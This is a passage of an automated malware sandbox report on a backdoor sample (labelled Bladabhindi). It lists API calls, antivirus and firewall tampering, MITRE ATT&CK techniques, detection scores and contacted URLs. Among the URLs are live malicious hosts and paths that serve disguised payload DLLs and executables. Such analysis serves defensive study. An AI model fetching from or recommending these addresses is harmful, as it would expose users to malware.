Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012B7D79 GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

32_2_012B7D79

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012AFB2B LookupAccountNameW,LookupAccountNameW,GetLastError,GetLastError,GetLastError,LookupAccountNameW,GetLastError,

32_2_012AFB2B

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Code function: 32_2_012835A5 ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,CreateNamedPipeW,GetLastError,

32_2_012835A5

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

31_2_01003972

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000001C.00000002.492289961.000001D1EF702000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Network Sniffing	12 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	3 Native API	1 Image File Execution Options Injection	1 Image File Execution Options Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	12 Command and Scripting Interpreter	31 Windows Service	1 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	11 Registry Run Keys / Startup Folder	31 Windows Service	12 Software Packing	NTDS	1 Network Sniffing	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	12 Process Injection	1 Timestomp	LSA Secrets	45 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	13 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	61 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	132 Masquerading	DCSync	3 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	11 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	3 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	12 Process Injection	Input Capture	1 Remote System Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ywvz5i8kT9.exe	71%	Virustotal		Browse
ywvz5i8kT9.exe	26%	Metadefender		Browse
ywvz5i8kT9.exe	85%	ReversingLabs	Win32.Backdoor.Bladabhindi
ywvz5i8kT9.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\4863269369430a9b27\1028\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1028\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1031\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1031\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1033\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1033\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1036\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1036\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1040\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1040\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1041\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1041\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1042\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1042\SetupResources.dll	0%	ReversingLabs
C:\4863269369430a9b27\1049\SetupResources.dll	0%	Metadefender	Browse
C:\4863269369430a9b27\1049\SetupResources.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
43.0.RuntimeBroker.exe.f70000.0.unpack	100%	Avira	HEUR/AGEN.1208636		Download File
43.2.RuntimeBroker.exe.f70000.0.unpack	100%	Avira	HEUR/AGEN.1208636		Download File

Domains

Source	Detection	Scanner	Label	Link
201.75.14.0.in-addr.arpa	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://45.135.48.153/Vv/1/vcredist_2013_x64.exe	8%	Virustotal		Browse
http://45.135.48.153/Vv/1/vcredist_2013_x64.exe	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr(	0%	Avira URL Cloud	safe
http://www.sakkal.comx	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/8	0%	URL Reputation	safe
http://113.212.88.126/Vv/1/process.json	0%	Virustotal		Browse
http://113.212.88.126/Vv/1/process.json	0%	Avira URL Cloud	safe
http://45.135.48.153/Vv/1/RuntimeBroker_64.dll	10%	Virustotal		Browse
http://45.135.48.153/Vv/1/RuntimeBroker_64.dll	100%	Avira URL Cloud	malware
http://45.135.48.153/Vv/1/PcapDotNet.Core_64.dll	9%	Virustotal		Browse
http://45.135.48.153/Vv/1/PcapDotNet.Core_64.dll	100%	Avira URL Cloud	malware
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/(	0%	URL Reputation	safe
http://www.bingmapsportal.comsv	0%	URL Reputation	safe
http://www.sandoll.co.krF	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://45.135.48.153/Vv/1/PcapDotNet.Core.Extensions_64.dll	100%	Avira URL Cloud	malware
http://45.135.48.153/Vv/1/Remove.dll	100%	Avira URL Cloud	malware
http://45.135.48.153/Vv/1/RuntimeBrokerBin_64.dll	100%	Avira URL Cloud	malware
http://www.fontbureau.comiven-us	0%	Avira URL Cloud	safe
http://113.212.88.126/Vv/Ip.json	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/.TTC	0%	URL Reputation	safe
http://113.212.88.126:888	0%	Avira URL Cloud	safe
http://#/Vv/resource.json	0%	Avira URL Cloud	safe
http://113.212.88.126x	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://45.135.48.153/Vv/1/install_wim_tweak.dll	100%	Avira URL Cloud	malware
https://%s.xboxlive.com	0%	URL Reputation	safe
http://45.135.48.153/Vv/1/	100%	Avira URL Cloud	malware
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
http://113.212.88.126:88/log	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/(	0%	URL Reputation	safe
http://www.sajatypeworks.comrw	0%	Avira URL Cloud	safe
http://a1212.me/Vv/RuntimeBrokerBin_64.exe	100%	Avira URL Cloud	malware
http://www.sandoll.co.krim	0%	URL Reputation	safe
http://www.sandoll.co.krnta	0%	Avira URL Cloud	safe
http://a1212.me/Vv/RuntimeBrokerBin_32.exe	100%	Avira URL Cloud	malware
http://113.212.88.126:88x	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/H	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://113.212.88.126/Vv/resource.json	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/Y0/Fa	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://45.135.48.1538	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://45.135.48.153/Vv/Ip.json	100%	Avira URL Cloud	malware
http://www.fontbureau.comva	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnm	0%	URL Reputation	safe
http://45.135.48.153	100%	Avira URL Cloud	malware
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://45.135.48.153/Vv/1/PcapDotNet.Base_64.dll	100%	Avira URL Cloud	malware
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
201.75.14.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.135.48.153/Vv/1/vcredist_2013_x64.exe	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://113.212.88.126/Vv/1/process.json	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://45.135.48.153/Vv/1/RuntimeBroker_64.dll	true	10%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://45.135.48.153/Vv/1/PcapDotNet.Core_64.dll	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://45.135.48.153/Vv/1/PcapDotNet.Core.Extensions_64.dll	true	Avira URL Cloud: malware	unknown
http://45.135.48.153/Vv/1/Remove.dll	true	Avira URL Cloud: malware	unknown
http://45.135.48.153/Vv/1/RuntimeBrokerBin_64.dll	true	Avira URL Cloud: malware	unknown
http://113.212.88.126/Vv/Ip.json	true	Avira URL Cloud: safe	unknown
http://45.135.48.153/Vv/1/install_wim_tweak.dll	true	Avira URL Cloud: malware	unknown
http://113.212.88.126:88/log	true	Avira URL Cloud: safe	unknown
http://113.212.88.126/Vv/resource.json	true	Avira URL Cloud: safe	unknown
http://45.135.48.153/Vv/Ip.json	true	Avira URL Cloud: malware	unknown
http://45.135.48.153/Vv/1/PcapDotNet.Base_64.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wixtoolset.org/schemas/thmutil/20100.30501.0	vcredist_2013_x64.exe, 00000023.00000003.350949207.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wixtoolset.org/schemas/thmutil/2010	vcredist_2013_x64.exe, 00000023.00000003.351059040.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, thm.xml.35.dr	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000019.00000003.312123607.000002196F850000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312591094.000002196F856000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312249223.000002196F855000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr(	ywvz5i8kT9.exe, 00000000.00000003.235768974.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers	ywvz5i8kT9.exe, 00000000.00000003.250163855.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.250450243.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242948918.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.243267669.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sakkal.comx	ywvz5i8kT9.exe, 00000000.00000003.239917168.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/8	ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239627688.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312572844.000002196F842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312236331.000002196F841000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersers	ywvz5i8kT9.exe, 00000000.00000003.242515498.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242431869.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wixtoolset.org/schemas/thmutil/2010mas.m	vcredist_2013_x64.exe, 00000023.00000003.350949207.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/(	ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239627688.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bingmapsportal.comsv	svchost.exe, 00000019.00000002.312526329.000002196F813000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.krF	ywvz5i8kT9.exe, 00000000.00000003.235995216.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ywvz5i8kT9.exe, 00000000.00000002.493499241.00000000033FA000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493479806.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comiven-us	ywvz5i8kT9.exe, 00000000.00000003.250257094.000000001C2BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wixtoolset.org/schemas/thmutil/2010ft	vcredist_2013_x64.exe, 00000023.00000003.350949207.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/.TTC	ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://113.212.88.126:888	RuntimeBroker.exe, 0000002B.00000002.493637205.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.496188314.00000000036E8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493980642.0000000003303000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000019.00000003.312230632.000002196F845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp	false		high
http://#/Vv/resource.json	ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.491314449.0000000000F72000.00000002.00000001.01000000.0000000E.sdmp, RuntimeBroker.exe0.0.dr	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://113.212.88.126x	RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.ver)	svchost.exe, 00000021.00000002.493981813.0000020AC4664000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://nsis.sf.net/NSIS_ErrorError	WinPcap_4_1_3.exe, 0000001E.00000000.313186532.0000000000409000.00000008.00000001.01000000.00000007.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.370589882.0000000000625000.00000004.00000020.00020000.00000000.sdmp, WinPcap_4_1_3.exe.0.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000019.00000002.312526329.000002196F813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000017.00000002.492172371.00000153B0A44000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://45.135.48.153/Vv/1/	ywvz5i8kT9.exe, 00000000.00000002.493670964.000000000346C000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	false		high
http://en.w	ywvz5i8kT9.exe, 00000000.00000003.234699840.000000001C2AF000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.234622439.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.233464647.000000001C2A2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	ywvz5i8kT9.exe, 00000000.00000003.236080809.000000001C2B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	WinPcap_4_1_3.exe, 0000001E.00000000.313186532.0000000000409000.00000008.00000001.01000000.00000007.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.370589882.0000000000625000.00000004.00000020.00020000.00000000.sdmp, WinPcap_4_1_3.exe.0.dr	false		high
https://dynamic.t	svchost.exe, 00000019.00000003.312249223.000002196F855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312572844.000002196F842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312236331.000002196F841000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/(	ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comrw	ywvz5i8kT9.exe, 00000000.00000003.234159980.000000001C2BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://a1212.me/Vv/RuntimeBrokerBin_64.exe	RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sandoll.co.krim	ywvz5i8kT9.exe, 00000000.00000003.235995216.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.235768974.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.winpcap.org/	WinPcap Web Site.url.30.dr	false		high
http://www.sandoll.co.krnta	ywvz5i8kT9.exe, 00000000.00000003.235768974.000000001C2AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	false		high
http://a1212.me/Vv/RuntimeBrokerBin_32.exe	RuntimeBroker.exe, 0000002B.00000002.493614686.00000000031E7000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000019.00000002.312579302.000002196F84B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000019.00000003.312177604.000002196F849000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://113.212.88.126:88x	RuntimeBroker.exe, 0000002B.00000002.493637205.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers/?	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersK	ywvz5i8kT9.exe, 00000000.00000003.244415198.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244514029.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244629442.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/H	ywvz5i8kT9.exe, 00000000.00000003.239516895.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0/Fa	ywvz5i8kT9.exe, 00000000.00000003.239606517.000000001C2B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers0.	ywvz5i8kT9.exe, 00000000.00000003.245127944.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.winpcap.org	WinPcap_4_1_3.exe, 0000001E.00000003.339377384.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.341353098.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.373685408.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.343032242.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.385069045.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.340422993.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.386301100.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, WinPcap_4_1_3.exe, 0000001E.00000003.345548450.0000000002B80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000019.00000003.312216541.000002196F840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.312572844.000002196F842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.312236331.000002196F841000.00000004.00000020.00020000.00000000.sdmp	false		high
